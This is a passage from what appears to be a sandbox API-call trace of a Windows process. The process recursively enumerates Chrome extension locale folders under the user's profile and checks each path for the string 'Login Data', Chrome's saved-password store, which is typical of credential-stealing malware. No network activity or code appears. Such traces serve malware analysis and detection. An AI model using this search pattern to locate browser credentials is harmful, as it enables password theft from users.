Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" [0161.544] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.544] GetProcessHeap () returned 0x8e0000 [0161.544] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.544] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json", lpSrch="Login Data") returned 0x0 [0161.544] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.544] GetProcessHeap () returned 0x8e0000 [0161.544] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.544] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859abe80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdf, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.544] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.544] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.544] GetProcessHeap () returned 0x8e0000 [0161.544] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.544] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.544] GetProcessHeap () returned 0x8e0000 [0161.544] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.544] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="es_419", cAlternateFileName="")) returned 1 [0161.544] lstrcmpiW (lpString1="es_419", lpString2=".") returned 1 [0161.544] lstrcmpiW (lpString1="es_419", lpString2="..") returned 1 [0161.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.544] lstrlenW (lpString="\\") returned 1 [0161.544] GetProcessHeap () returned 0x8e0000 [0161.544] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.545] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.545] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.545] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.545] lstrlenW (lpString="es_419") returned 6 [0161.545] GetProcessHeap () returned 0x8e0000 [0161.545] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x925dd8 [0161.545] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.545] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419" [0161.545] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.545] GetProcessHeap () returned 0x8e0000 [0161.545] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.545] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419") returned 141 [0161.545] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419") returned 141 [0161.545] lstrlenW (lpString="\\*.*") returned 4 [0161.545] GetProcessHeap () returned 0x8e0000 [0161.545] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x124) returned 0x91a0a8 [0161.545] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419" [0161.545] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\*.*" [0161.545] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.545] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.545] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.545] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.545] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.545] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.545] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419") returned 141 [0161.545] lstrlenW (lpString="\\") returned 1 [0161.546] GetProcessHeap () returned 0x8e0000 [0161.546] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11e) returned 0x91b1e0 [0161.546] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419" [0161.546] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\" [0161.546] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\") returned 142 [0161.546] lstrlenW (lpString="messages.json") returned 13 [0161.546] GetProcessHeap () returned 0x8e0000 [0161.546] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x138) returned 0x91b308 [0161.546] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\" [0161.546] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" [0161.546] VirtualQuery (in: lpAddress=0x91b1e0, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.546] GetProcessHeap () returned 0x8e0000 [0161.546] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1e0 | out: hHeap=0x8e0000) returned 1 [0161.546] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json", lpSrch="Login Data") returned 0x0 [0161.546] VirtualQuery (in: lpAddress=0x91b308, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.546] GetProcessHeap () returned 0x8e0000 [0161.546] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b308 | out: hHeap=0x8e0000) returned 1 [0161.546] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.546] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.546] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.546] GetProcessHeap () returned 0x8e0000 [0161.546] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.546] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.546] GetProcessHeap () returned 0x8e0000 [0161.546] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.547] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="et", cAlternateFileName="")) returned 1 [0161.547] lstrcmpiW (lpString1="et", lpString2=".") returned 1 [0161.547] lstrcmpiW (lpString1="et", lpString2="..") returned 1 [0161.547] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.547] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.547] lstrlenW (lpString="\\") returned 1 [0161.547] GetProcessHeap () returned 0x8e0000 [0161.547] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.547] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.547] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.547] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.547] lstrlenW (lpString="et") returned 2 [0161.547] GetProcessHeap () returned 0x8e0000 [0161.547] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.547] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.547] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et" [0161.547] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.547] GetProcessHeap () returned 0x8e0000 [0161.547] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.547] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et") returned 137 [0161.547] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et") returned 137 [0161.547] lstrlenW (lpString="\\*.*") returned 4 [0161.547] GetProcessHeap () returned 0x8e0000 [0161.547] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.547] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et" [0161.547] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\*.*" [0161.547] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.548] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.548] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.548] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.548] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.548] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.548] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et") returned 137 [0161.548] lstrlenW (lpString="\\") returned 1 [0161.548] GetProcessHeap () returned 0x8e0000 [0161.548] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.548] lstrcatW (in: lpString1="", 